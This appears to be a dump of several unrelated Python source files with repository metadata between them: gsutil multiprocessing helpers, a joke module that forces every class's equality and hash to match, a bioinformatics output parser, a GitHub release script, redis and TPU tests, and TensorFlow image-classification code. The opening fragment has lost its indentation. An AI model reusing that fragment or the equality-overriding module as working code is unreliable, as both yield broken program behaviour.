resource.setrlimit(resource_name, (hard_limit, hard_limit))
return hard_limit
except (resource.error, ValueError):
# We'll ignore this and try the fallback value.
pass
# Try to set the value of the soft limit to the fallback value.
if soft_limit < fallback_value:
try:
resource.setrlimit(resource_name, (fallback_value, hard_limit))
return fallback_value
except (resource.error, ValueError):
# We couldn't change the soft limit, so just report the current
# value of the soft limit.
return soft_limit
else:
return soft_limit
def CheckMultiprocessingAvailableAndInit(logger=None):
"""Checks if multiprocessing is available.
There are some environments in which there is no way to use multiprocessing
logic that's built into Python (e.g., if /dev/shm is not available, then
we can't create semaphores). This simply tries out a few things that will be
needed to make sure the environment can support the pieces of the
multiprocessing module that we need.
If multiprocessing is available, this performs necessary initialization for
multiprocessing. See gslib.command.InitializeMultiprocessingVariables for
an explanation of why this is necessary.
Args:
logger: (logging.Logger) Logger to use for debug output.
Returns:
(MultiprocessingIsAvailableResult) A namedtuple with the following attrs:
- multiprocessing_is_available: True iff the multiprocessing module is
available for use.
- stack_trace: The stack trace generated by the call we tried that
failed.
"""
# pylint: disable=global-variable-undefined
global _cached_multiprocessing_is_available
global _cached_multiprocessing_check_stack_trace
global _cached_multiprocessing_is_available_message
if _cached_multiprocessing_is_available is not None:
if logger:
logger.debug(_cached_multiprocessing_check_stack_trace)
logger.warn(_cached_multiprocessing_is_available_message)
return MultiprocessingIsAvailableResult(
is_available=_cached_multiprocessing_is_available,
stack_trace=_cached_multiprocessing_check_stack_trace)
if system_util.IS_WINDOWS:
message = """
Multiple processes are not supported on Windows. Operations requesting
parallelism will be executed with multiple threads in a single process only.
"""
if logger:
logger.warn(message)
return MultiprocessingIsAvailableResult(is_available=False,
stack_trace=None)
stack_trace = None
multiprocessing_is_available = True
message = """
You have requested multiple processes for an operation, but the
required functionality of Python\'s multiprocessing module is not available.
Operations requesting parallelism will be executed with multiple threads in a
single process only.
"""
try:
# Fails if /dev/shm (or some equivalent thereof) is not available for use
# (e.g., there's no implementation, or we can't write to it, etc.).
try:
multiprocessing.Value('i', 0)
except:
message += """
Please ensure that you have write access to both /dev/shm and /run/shm.
"""
raise # We'll handle this in one place below.
global top_level_manager # pylint: disable=global-variable-undefined
top_level_manager = multiprocessing.Manager()
# Check that the max number of open files is reasonable. Always check this
# after we're sure that the basic multiprocessing functionality is
# available, since this won't matter unless that's true.
limit = -1
if _HAS_RESOURCE_MODULE:
# Try to set this with both resource names - RLIMIT_NOFILE for most Unix
# platforms, and RLIMIT_OFILE for BSD. Ignore AttributeError because the
# "resource" module is not guaranteed to know about these names.
try:
limit = max(
limit,
_IncreaseSoftLimitForResource(
resource.RLIMIT_NOFILE,
constants.MIN_ACCEPTABLE_OPEN_FILES_LIMIT))
except AttributeError:
pass
try:
limit = max(
limit,
_IncreaseSoftLimitForResource(
resource.RLIMIT_OFILE,
constants.MIN_ACCEPTABLE_OPEN_FILES_LIMIT))
except AttributeError:
pass
if limit < constants.MIN_ACCEPTABLE_OPEN_FILES_LIMIT:
message += ("""
Your max number of open files, %s, is too low to allow safe multiprocessing.
On Linux you can fix this by adding something like "ulimit -n 10000" to your
~/.bashrc or equivalent file and opening a new terminal.
On macOS, you may also need to run a command like this once (in addition to the
above instructions), which might require a restart of your system to take
effect:
launchctl limit maxfiles 10000
Alternatively, edit /etc/launchd.conf with something like:
limit maxfiles 10000 10000
""" % limit)
raise Exception('Max number of open files, %s, is too low.' % limit)
except: # pylint: disable=bare-except
stack_trace = traceback.format_exc()
multiprocessing_is_available = False
if logger is not None:
logger.debug(stack_trace)
logger.warn(message)
# Set the cached values so that we never need to do this check again.
_cached_multiprocessing_is_available = multiprocessing_is_available
_cached_multiprocessing_check_stack_trace = stack_trace
_cached_multiprocessing_is_available_message = message
return MultiprocessingIsAvailableResult(
is_available=_cached_multiprocessing_is_available,
stack_trace=_cached_multiprocessing_check_stack_trace)
def CreateLock():
"""Returns either a multiprocessing lock or a threading lock.
Use Multiprocessing lock iff we have access to the parts of the
multiprocessing module that are necessary to enable parallelism in operations.
Returns:
Multiprocessing or threading lock.
"""
if CheckMultiprocessingAvailableAndInit().is_available:
return top_level_manager.Lock()
else:
return threading.Lock()
# Pylint gets confused by the mixed lower and upper-case method names in
# AtomicDict.
# pylint: disable=invalid-name
def PutToQueueWithTimeout(queue, msg, timeout=STATUS_QUEUE_OP_TIMEOUT):
"""Puts an item to the status queue.
If the queue is full, this function will timeout periodically and repeat
until success. This avoids deadlock during shutdown by never making a fully
blocking call to the queue, since Python signal handlers cannot execute
in between instructions of the Python interpreter (see
https://docs.python.org/2/library/signal.html for details).
Args:
queue: Queue class (typically the global status queue)
msg: message to post to the queue.
timeout: (optional) amount of time to wait before repeating put request.
"""
put_success = False
while not put_success:
try:
queue.put(msg, timeout=timeout)
put_success = True
except Queue.Full:
pass
# pylint: enable=invalid-name
| 34.488722
| 80
| 0.729598
|
794b15b9b98f303ae93321d6d0dcf4190dbefd07
| 870
|
py
|
Python
|
communism.py
|
mdbecker/python_communism
|
23598b3be9461b1ecd1e1e05dab4a5f7bd24d433
|
[
"Unlicense"
] | null | null | null |
communism.py
|
mdbecker/python_communism
|
23598b3be9461b1ecd1e1e05dab4a5f7bd24d433
|
[
"Unlicense"
] | null | null | null |
communism.py
|
mdbecker/python_communism
|
23598b3be9461b1ecd1e1e05dab4a5f7bd24d433
|
[
"Unlicense"
] | null | null | null |
from typing import Iterable, Union
def revolution(to_convert: Union[dict, Iterable]):
import inspect, builtins
__PythonIntrinsicGlobalStructures__ = dir(builtins)
def convert(c):
from types import MethodType
# We must protect the builtin elite to not be affected by the revolution
if inspect.isclass(c) and c.__name__ not in __PythonIntrinsicGlobalStructures__:
try:
c.__eq__ = MethodType(lambda s, _: True, c)
c.__hash__ = MethodType(lambda s: hash(1), c)
except:
print(f"Failed to convert {c} to communism.")
to_convert = to_convert.values() if isinstance(to_convert, dict) else to_convert
for m in to_convert:
if inspect.ismodule(m):
for c in vars(m).values():
convert(c)
else:
convert(m)
| 32.222222
| 88
| 0.62069
|
794b17f4b986639cea5572a09373c7c5d66c3046
| 153
|
py
|
Python
|
src/virtualenvrunner/_version.py
|
petrieh/virtualenvrunner
|
5764a789e492479812261fbe4982ac0d50c5212f
|
[
"BSD-3-Clause"
] | null | null | null |
src/virtualenvrunner/_version.py
|
petrieh/virtualenvrunner
|
5764a789e492479812261fbe4982ac0d50c5212f
|
[
"BSD-3-Clause"
] | null | null | null |
src/virtualenvrunner/_version.py
|
petrieh/virtualenvrunner
|
5764a789e492479812261fbe4982ac0d50c5212f
|
[
"BSD-3-Clause"
] | null | null | null |
__copyright__ = 'Copyright (C) 2019, Nokia'
VERSION = '1.1'
GITHASH = ''
def get_version():
return VERSION
def get_githash():
return GITHASH
| 12.75
| 43
| 0.666667
|
794b180a5aab333cc9910ae838d4fa2e1e559dcd
| 4,540
|
py
|
Python
|
infer_parser.py
|
RuiNascimento/infer_parser
|
973da3a8dfe5018b5953d41d2ecfdd364f1b80e8
|
[
"MIT"
] | null | null | null |
infer_parser.py
|
RuiNascimento/infer_parser
|
973da3a8dfe5018b5953d41d2ecfdd364f1b80e8
|
[
"MIT"
] | null | null | null |
infer_parser.py
|
RuiNascimento/infer_parser
|
973da3a8dfe5018b5953d41d2ecfdd364f1b80e8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
'''
A simple script to automate the use of infer_experiment.py provided in the REsQC package.
Output of infer_experiment.py can be pipep into infer_parser or used as an argument.
Example usage:
infer_experiment -i aligment.sam -r reference.bed | ./infer_parser.py
or
./infer_parser.py infer_experiment_output.txt
Args:
filename, output of infer_experiment, can be pipep via stdin alternativelly
-i, --ignore_failed, ignore the failed to determine fraction
-m, --max_failed, float fraction of maximum allowed for the failed to determine fraction. Default = 0.1
-s, --simple, Simple output, for usage in scripts/pipelines.
'''
import sys
import os
import argparse
__author__ = "Rui Nascimento"
__copyright__ = "Copyright 2019, Rui Nascimento"
__credits__ = ["Rui Nascimento"]
__license__ = "MIT License"
__version__ = "1.0.1"
__maintainer__ = "Rui Nascimento"
__email__ = "rui_nascimento93@hotmail.com"
__status__ = "Development"
# Verbose management
def blockPrint():
sys.stdout = open(os.devnull, 'w')
def enablePrint():
sys.stdout = sys.__stdout__
# Determine the type of experiment
def type_of_experiment(data):
if 'SingleEnd' in data:
print('Single End experiment')
# return'singleend'
elif 'PairEnd' in data:
print('Pair End experiment')
# return 'pairend'
else:
print('Could not determine type of experiment!')
# Parse the fractions
def get_info(data):
failed = "Couldn't determine the failed fraction"
first = "Couldn't determine the '++,--' fraction"
second = "Couldn't determine the '+-,-+' fraction"
for line in data.splitlines():
if line.startswith('Fraction of reads failed to determine:'):
failed = line.split(': ')[1]
elif line.startswith('Fraction of reads explained by "++,--":'):
first = line.split(': ')[1]
elif line.startswith('Fraction of reads explained by "+-,-+":'):
second = line.split(': ')[1]
elif line.startswith('Fraction of reads explained by "1++,1--,2+-,2-+":'):
first = line.split(': ')[1]
elif line.startswith('Fraction of reads explained by "1+-,1-+,2++,2--":'):
second = line.split(': ')[1]
return (failed,first,second)
# Check if failed fraction is to big
def check_failed(info, max_failed=0.1):
info = float(info[0])
if info > max_failed:
print('Failed fraction is more than '+'{:.2%}'.format(max_failed)+' of the data, please double check results')
exit()
# Check strand to infer HTseq --stranded option to use
def check_strand(info):
first, second = float(info[1]), float(info[2])
difference = abs(first-second)
if difference > 0.02 and difference < 0.15:
print('Please double check infer_experiment results!')
if difference >= 0.15:
if first > second:
print("--stranded yes")
if args.simple:
enablePrint()
print('yes')
else:
print('--stranded reverse')
if args.simple:
enablePrint()
print('reverse')
else:
print("++,-- and +-,-+ factions too similiar, probabily unstranded")
print("--stranded no")
if args.simple:
enablePrint()
print('no')
# Arguments configuration
parser = argparse.ArgumentParser(prog='infer_parser.py', usage='%(prog)s [options]', description='A simple script to pipe the output of infer_experiment.py in order to determine the correct arguments for HTseq.')
parser.add_argument('-i', '--ignore_failed', action='store_false', help='Ignore fraction of failed to determine.')
parser.add_argument('-m', '--max_failed', action='store', type=float, metavar='', help='Maximum allowed for the failed to determine fraction. Example: -m 0.1')
parser.add_argument('-s', '--simple', action='store_true', help='Simple output, for usage in scripts/pipelines.')
parser.add_argument('filename', nargs='?')
args = parser.parse_args()
if __name__ == "__main__":
if args.filename:
data = open(args.filename).read()
elif not sys.stdin.isatty():
data = sys.stdin.read()
else:
parser.print_help()
exit()
if args.simple:
blockPrint()
type_of_experiment(data)
info = get_info(data)
if args.ignore_failed:
if args.max_failed:
check_failed(info,max_failed=args.max_failed)
else:
check_failed(info,max_failed=0.1)
check_strand(info)
| 36.031746
| 212
| 0.648899
|
794b18480b943544f18b789cfe627b267ce66824
| 2,483
|
py
|
Python
|
release.py
|
ownrecipes/OwnRecipes
|
733e60d4abae59481a33f5663b902a32dda7afdc
|
[
"MIT"
] | 1
|
2022-03-12T12:23:49.000Z
|
2022-03-12T12:23:49.000Z
|
release.py
|
ownrecipes/OwnRecipes
|
733e60d4abae59481a33f5663b902a32dda7afdc
|
[
"MIT"
] | 4
|
2022-02-18T15:27:06.000Z
|
2022-03-31T10:39:30.000Z
|
release.py
|
ownrecipes/OwnRecipes
|
733e60d4abae59481a33f5663b902a32dda7afdc
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# encoding: utf-8
import json
import requests
from requests.auth import HTTPBasicAuth
from secrets.secrets import username, password
def release(_repo, _tag, _name, _target, _body, _draft, _prerelease):
"""
Send a post request to github to log a release.
Then print out the response status and message.
"""
response = requests.post(
'https://api.github.com/repos/ownrecipes/%s/releases' % _repo,
json={
"tag_name": _tag,
"target_commitish": _target,
"name": _name,
"body": _body,
"draft": _draft,
"prerelease": _prerelease
},
auth=HTTPBasicAuth(username, password)
)
print('Status: %s' % response)
print('Response: %s' % response.text)
# Define some help test that the json file should follow.
help_text = '''
A JSON file with release info in it. See below for an example.
{
"tag": "1.1.1",
"name": "Release Test",
"body": "the is a test release!",
"target": "master",
"draft": false,
"prerelease": false
}
'''
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
description='OwnRecipes release script.'
)
# Require a json file as part of the script
parser.add_argument(
'release',
type=str,
help=help_text
)
# Open the json file and try and parse it into a json file
with open(parser.parse_args().release, 'r') as fp:
args = json.loads(fp.read())
# All json files should have this format.
json_format = [
'tag',
'name',
'target',
'body',
'draft',
'prerelease',
]
# Iterate through the `json_format` array and
# make sure the json file supplied has all the required fields.
for key in json_format:
try:
tmp = args[key]
except (IndexError, KeyError):
print("$s missing! Please add it." % key)
exit(1)
# The list of repos we want to push a release to.
repos = [
'ownrecipes-nginx',
'ownrecipes-api',
'ownrecipes-web',
'OwnRecipes'
]
# Run a release for all the repos with the data from json file.
for r in repos:
release(
r,
args.get('tag'),
args.get('name'),
args.get('target'),
args.get('body'),
args.get('draft'),
args.get('prerelease')
)
| 25.080808
| 70
| 0.573097
|
794b18b92a2bf24f04f197842bc90711af9b974f
| 5,001
|
py
|
Python
|
tests/test_counter.py
|
Heiss/py-datatype-redis
|
db75b94c22a3c5fecb202e9138892c674a62d47f
|
[
"MIT"
] | null | null | null |
tests/test_counter.py
|
Heiss/py-datatype-redis
|
db75b94c22a3c5fecb202e9138892c674a62d47f
|
[
"MIT"
] | 2
|
2020-07-22T08:01:42.000Z
|
2020-08-17T11:11:07.000Z
|
tests/test_counter.py
|
Heiss/py-datatype-redis
|
db75b94c22a3c5fecb202e9138892c674a62d47f
|
[
"MIT"
] | null | null | null |
from tests.prepare import BaseTestCase, datatype_redis, unittest
import collections
class CounterTests(BaseTestCase):
def test_value(self):
a = "wagwaan"
b = {"hot": 420, "skull": -9000}
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
e = collections.Counter(**b)
f = datatype_redis.MultiSet(**b)
self.assertEqual(d, c)
self.assertEqual(f, e)
def test_empty(self):
self.assertEqual(datatype_redis.MultiSet(), collections.Counter())
def test_values(self):
a = "wagwaan"
b = {"hot": 420, "skull": -9000}
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
e = collections.Counter(**b)
f = datatype_redis.MultiSet(**b)
self.assertItemsEqual(c.values(), d.values())
self.assertItemsEqual(e.values(), f.values())
def test_get(self):
a = "wagwaan"
b = {"hot": 420, "skull": -9000}
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
e = collections.Counter(**b)
f = datatype_redis.MultiSet(**b)
self.assertEqual(c.get("a"), d.get("a"))
self.assertEqual(c.get("flute", "don"), d.get("flute", "don"))
self.assertEqual(e.get("hot"), f.get("hot"))
self.assertEqual(e.get("skull"), f.get("skull"))
self.assertEqual(e.get("flute", "don"), e.get("flute", "don"))
def test_del(self):
a = datatype_redis.MultiSet("wagwaan")
del a["hotskull"]
def test_update(self):
a = "wagwaan"
b = {"hotskull": 420}
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
c.update(datatype_redis.MultiSet(a))
d.update(datatype_redis.MultiSet(a))
self.assertEqual(d, c)
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
c.update(collections.Counter(a))
d.update(collections.Counter(a))
self.assertEqual(d, c)
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
c.update(a)
d.update(a)
self.assertEqual(d, c)
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
c.update(b)
d.update(b)
self.assertEqual(d, c)
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
c.update(**b)
d.update(**b)
self.assertEqual(d, c)
def test_subtract(self):
a = "wagwaan"
b = {"hotskull": 420}
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
c.subtract(datatype_redis.MultiSet(a))
d.subtract(datatype_redis.MultiSet(a))
self.assertEqual(d, c)
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
c.subtract(collections.Counter(a))
d.subtract(collections.Counter(a))
self.assertEqual(d, c)
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
c.subtract(a)
d.subtract(a)
self.assertEqual(d, c)
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
c.subtract(b)
d.subtract(b)
self.assertEqual(d, c)
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
c.subtract(**b)
d.subtract(**b)
self.assertEqual(d, c)
def test_intersection(self):
a = "wagwaan"
b = "flute don"
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
c &= datatype_redis.MultiSet(b)
d &= datatype_redis.MultiSet(b)
self.assertEqual(d, c)
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
c &= collections.Counter(b)
d &= collections.Counter(b)
self.assertEqual(d, c)
def test_union(self):
a = "wagwaan"
b = "flute don"
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
c |= datatype_redis.MultiSet(b)
d |= datatype_redis.MultiSet(b)
self.assertEqual(d, c)
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
c |= collections.Counter(b)
d |= collections.Counter(b)
self.assertEqual(d, c)
def test_elements(self):
a = "wagwaan"
b = {"hotskull": 420}
c = collections.Counter(a)
d = datatype_redis.MultiSet(a)
e = collections.Counter(**b)
f = datatype_redis.MultiSet(**b)
self.assertItemsEqual(sorted(c.elements()), sorted(d.elements()))
self.assertItemsEqual(sorted(e.elements()), sorted(f.elements()))
def test_most_common(self):
a = "wagwaan"
b = collections.Counter(a)
c = datatype_redis.MultiSet(a)
d = 420
check = b.most_common(d)
for i, e in enumerate(c.most_common(d)):
self.assertEqual(e[1], check[i][1])
check = b.most_common()
for i, e in enumerate(c.most_common()):
self.assertEqual(e[1], check[i][1])
| 32.686275
| 74
| 0.570686
|
794b192ae0f0dd6f573334d1884ec9e2cfd331ec
| 747
|
py
|
Python
|
Python/remove-duplicates-from-sorted-array-ii.py
|
bssrdf/LeetCode-5
|
746df5cff523361145a74d9d429dc541a7b99910
|
[
"MIT"
] | 68
|
2018-01-13T07:15:37.000Z
|
2022-02-20T12:58:24.000Z
|
Python/remove-duplicates-from-sorted-array-ii.py
|
ambershen/LeetCode
|
0c53580697b05fadb3981d97bd25f1d9da65fd2f
|
[
"MIT"
] | 2
|
2021-12-10T01:43:37.000Z
|
2021-12-14T21:48:53.000Z
|
Python/remove-duplicates-from-sorted-array-ii.py
|
ambershen/LeetCode
|
0c53580697b05fadb3981d97bd25f1d9da65fd2f
|
[
"MIT"
] | 63
|
2017-04-10T03:38:25.000Z
|
2022-03-17T23:24:51.000Z
|
# Time: O(n)
# Space: O(1)
#
# Follow up for "Remove Duplicates":
# What if duplicates are allowed at most twice?
#
# For example,
# Given sorted array A = [1,1,1,2,2,3],
#
# Your function should return length = 5, and A is now [1,1,2,2,3].
#
class Solution:
# @param a list of integers
# @return an integer
def removeDuplicates(self, A):
if not A:
return 0
last, i, same = 0, 1, False
while i < len(A):
if A[last] != A[i] or not same:
same = A[last] == A[i]
last += 1
A[last] = A[i]
i += 1
return last + 1
if __name__ == "__main__":
print Solution().removeDuplicates([1, 1, 1, 2, 2, 3])
| 23.34375
| 67
| 0.499331
|
794b194c4d5d126c47e8fbb8739f05a11b63d189
| 6,678
|
py
|
Python
|
tensorflow/python/tpu/tpu_test_wrapper_test.py
|
kartikburmee25/tensorflow-upstream
|
1aecc51dfb26a61cbf32291cfa47e88bc02e4c04
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/python/tpu/tpu_test_wrapper_test.py
|
kartikburmee25/tensorflow-upstream
|
1aecc51dfb26a61cbf32291cfa47e88bc02e4c04
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/python/tpu/tpu_test_wrapper_test.py
|
kartikburmee25/tensorflow-upstream
|
1aecc51dfb26a61cbf32291cfa47e88bc02e4c04
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Tests for tpu_test_wrapper.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import importlib.util # Python 3 only.
import os
from absl.testing import flagsaver
from tensorflow.python.platform import flags
from tensorflow.python.platform import test
from tensorflow.python.tpu import tpu_test_wrapper
class TPUTestWrapperTest(test.TestCase):
@flagsaver.flagsaver()
def test_flags_undefined(self):
tpu_test_wrapper.maybe_define_flags()
self.assertIn('tpu', flags.FLAGS)
self.assertIn('zone', flags.FLAGS)
self.assertIn('project', flags.FLAGS)
self.assertIn('model_dir', flags.FLAGS)
@flagsaver.flagsaver()
def test_flags_already_defined_not_overridden(self):
flags.DEFINE_string('tpu', 'tpuname', 'helpstring')
tpu_test_wrapper.maybe_define_flags()
self.assertIn('tpu', flags.FLAGS)
self.assertIn('zone', flags.FLAGS)
self.assertIn('project', flags.FLAGS)
self.assertIn('model_dir', flags.FLAGS)
self.assertEqual(flags.FLAGS.tpu, 'tpuname')
@flagsaver.flagsaver(bazel_repo_root='tensorflow/python')
def test_parent_path(self):
filepath = '/filesystem/path/tensorflow/python/tpu/example_test.runfiles/tensorflow/python/tpu/example_test' # pylint: disable=line-too-long
self.assertEqual(
tpu_test_wrapper.calculate_parent_python_path(filepath),
'tensorflow.python.tpu')
@flagsaver.flagsaver(bazel_repo_root='tensorflow/python')
def test_parent_path_raises(self):
filepath = '/bad/path'
with self.assertRaisesWithLiteralMatch(
ValueError,
'Filepath "/bad/path" does not contain repo root "tensorflow/python"'):
tpu_test_wrapper.calculate_parent_python_path(filepath)
def test_is_test_class_positive(self):
class A(test.TestCase):
pass
self.assertTrue(tpu_test_wrapper._is_test_class(A))
def test_is_test_class_negative(self):
class A(object):
pass
self.assertFalse(tpu_test_wrapper._is_test_class(A))
@flagsaver.flagsaver(wrapped_tpu_test_module_relative='.tpu_test_wrapper_test'
)
def test_move_test_classes_into_scope(self):
# Test the class importer by having the wrapper module import this test
# into itself.
with test.mock.patch.object(
tpu_test_wrapper, 'calculate_parent_python_path') as mock_parent_path:
mock_parent_path.return_value = (
tpu_test_wrapper.__name__.rpartition('.')[0])
module = tpu_test_wrapper.import_user_module()
tpu_test_wrapper.move_test_classes_into_scope(module)
self.assertEqual(
tpu_test_wrapper.tpu_test_imported_TPUTestWrapperTest.__name__,
self.__class__.__name__)
@flagsaver.flagsaver(test_dir_base='gs://example-bucket/tempfiles')
def test_set_random_test_dir(self):
tpu_test_wrapper.maybe_define_flags()
tpu_test_wrapper.set_random_test_dir()
self.assertStartsWith(flags.FLAGS.model_dir,
'gs://example-bucket/tempfiles')
self.assertGreater(
len(flags.FLAGS.model_dir), len('gs://example-bucket/tempfiles'))
@flagsaver.flagsaver(test_dir_base='gs://example-bucket/tempfiles')
def test_set_random_test_dir_repeatable(self):
tpu_test_wrapper.maybe_define_flags()
tpu_test_wrapper.set_random_test_dir()
first = flags.FLAGS.model_dir
tpu_test_wrapper.set_random_test_dir()
second = flags.FLAGS.model_dir
self.assertNotEqual(first, second)
def test_run_user_main(self):
test_module = _write_and_load_module("""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
VARS = 1
if 'unrelated_if' == 'should_be_ignored':
VARS = 2
if __name__ == '__main__':
VARS = 3
if 'extra_if_at_bottom' == 'should_be_ignored':
VARS = 4
""")
self.assertEqual(test_module.VARS, 1)
tpu_test_wrapper.run_user_main(test_module)
self.assertEqual(test_module.VARS, 3)
def test_run_user_main_missing_if(self):
test_module = _write_and_load_module("""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
VARS = 1
""")
self.assertEqual(test_module.VARS, 1)
with self.assertRaises(NotImplementedError):
tpu_test_wrapper.run_user_main(test_module)
def test_run_user_main_double_quotes(self):
test_module = _write_and_load_module("""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
VARS = 1
if "unrelated_if" == "should_be_ignored":
VARS = 2
if __name__ == "__main__":
VARS = 3
if "extra_if_at_bottom" == "should_be_ignored":
VARS = 4
""")
self.assertEqual(test_module.VARS, 1)
tpu_test_wrapper.run_user_main(test_module)
self.assertEqual(test_module.VARS, 3)
def test_run_user_main_test(self):
test_module = _write_and_load_module("""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.platform import test as unique_name
class DummyTest(unique_name.TestCase):
def test_fail(self):
self.fail()
if __name__ == '__main__':
unique_name.main()
""")
# We're actually limited in what we can test here -- we can't call
# test.main() without deleting this current test from locals(), or we'll
# recurse infinitely. We settle for testing that the test imports and calls
# the right test module.
with test.mock.patch.object(test, 'main') as mock_main:
tpu_test_wrapper.run_user_main(test_module)
#mock_main.assert_called_once()
def _write_and_load_module(source):
fp = os.path.join(test.get_temp_dir(), 'testmod.py')
with open(fp, 'w') as f:
f.write(source)
spec = importlib.util.spec_from_file_location('testmodule', fp)
test_module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(test_module)
return test_module
if __name__ == '__main__':
test.main()
| 31.205607
| 145
| 0.742288
|
794b1bb8e4d87704861028b82f6d0f655a6aa6c4
| 845
|
py
|
Python
|
setup.py
|
aced-differentiate/dft-input-gen
|
14bee323517714c433682bad2dcb897b223dd5ec
|
[
"Apache-2.0"
] | 1
|
2021-04-15T09:54:52.000Z
|
2021-04-15T09:54:52.000Z
|
setup.py
|
CitrineInformatics/dft-input-gen
|
14bee323517714c433682bad2dcb897b223dd5ec
|
[
"Apache-2.0"
] | 1
|
2021-01-28T22:12:07.000Z
|
2021-01-28T22:12:07.000Z
|
setup.py
|
aced-differentiate/dft-input-gen
|
14bee323517714c433682bad2dcb897b223dd5ec
|
[
"Apache-2.0"
] | 2
|
2020-12-08T18:14:13.000Z
|
2020-12-18T19:01:11.000Z
|
import os
from setuptools import setup
from setuptools import find_packages
with open(
os.path.join(
os.path.dirname(__file__), "src", "dftinputgen", "VERSION.txt"
)
) as fr:
version = fr.read().strip()
setup(
name="dftinputgen",
version=version,
description="Unopinionated library to generate input files for DFT codes",
url="https://github.com/CitrineInformatics/dft-input-gen",
author="Vinay Hegde",
author_email="vhegde@citrine.io",
packages=find_packages(where="src"),
package_dir={"": "src"},
include_package_data=True,
install_requires=["six", "numpy", "ase <= 3.17"],
entry_points={"console_scripts": ["dftinputgen = dftinputgen.cli:driver"]},
classifiers=[
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.8",
],
)
| 27.258065
| 79
| 0.657988
|
794b1bea3a9df2094b8b5a3e0f65233c8aca150e
| 9,428
|
py
|
Python
|
tutorials/image/imagenet/classify_image.py
|
JennieYuanChang/object_detection
|
289d68d309a6afabc5119600fdb5942509ca9fe8
|
[
"Apache-2.0"
] | null | null | null |
tutorials/image/imagenet/classify_image.py
|
JennieYuanChang/object_detection
|
289d68d309a6afabc5119600fdb5942509ca9fe8
|
[
"Apache-2.0"
] | null | null | null |
tutorials/image/imagenet/classify_image.py
|
JennieYuanChang/object_detection
|
289d68d309a6afabc5119600fdb5942509ca9fe8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Simple image classification with Inception.
Run image classification with Inception trained on ImageNet 2012 Challenge data
set.
This program creates a graph from a saved GraphDef protocol buffer,
and runs inference on an input JPEG image. It outputs human readable
strings of the top 5 predictions along with their probabilities.
Change the --image_file argument to any jpg image to compute a
classification of that image.
Please see the tutorial and website for a detailed description of how
to use this script to perform image recognition.
https://tensorflow.org/tutorials/image_recognition/
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os.path
import re
import sys
import tarfile
import numpy as np
from six.moves import urllib
import tensorflow as tf
FLAGS = None
# pylint: disable=line-too-long
DATA_URL = 'http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz'
# pylint: enable=line-too-long
class NodeLookup(object):
"""Converts integer node ID's to human readable labels."""
def __init__(self,FLAGS,
label_lookup_path=None,
uid_lookup_path=None):
if not label_lookup_path:
label_lookup_path = os.path.join(
FLAGS.model_dir, 'imagenet_2012_challenge_label_map_proto.pbtxt')
if not uid_lookup_path:
uid_lookup_path = os.path.join(
FLAGS.model_dir, 'imagenet_synset_to_human_label_map.txt')
self.node_lookup = self.load(label_lookup_path, uid_lookup_path)
def load(self, label_lookup_path, uid_lookup_path):
"""Loads a human readable English name for each softmax node.
Args:
label_lookup_path: string UID to integer node ID.
uid_lookup_path: string UID to human-readable string.
Returns:
dict from integer node ID to human-readable string.
"""
if not tf.gfile.Exists(uid_lookup_path):
tf.logging.fatal('File does not exist %s', uid_lookup_path)
if not tf.gfile.Exists(label_lookup_path):
tf.logging.fatal('File does not exist %s', label_lookup_path)
# Loads mapping from string UID to human-readable string
proto_as_ascii_lines = tf.gfile.GFile(uid_lookup_path).readlines()
uid_to_human = {}
p = re.compile(r'[n\d]*[ \S,]*')
for line in proto_as_ascii_lines:
parsed_items = p.findall(line)
uid = parsed_items[0]
human_string = parsed_items[2]
uid_to_human[uid] = human_string
# Loads mapping from string UID to integer node ID.
node_id_to_uid = {}
proto_as_ascii = tf.gfile.GFile(label_lookup_path).readlines()
for line in proto_as_ascii:
if line.startswith(' target_class:'):
target_class = int(line.split(': ')[1])
if line.startswith(' target_class_string:'):
target_class_string = line.split(': ')[1]
node_id_to_uid[target_class] = target_class_string[1:-2]
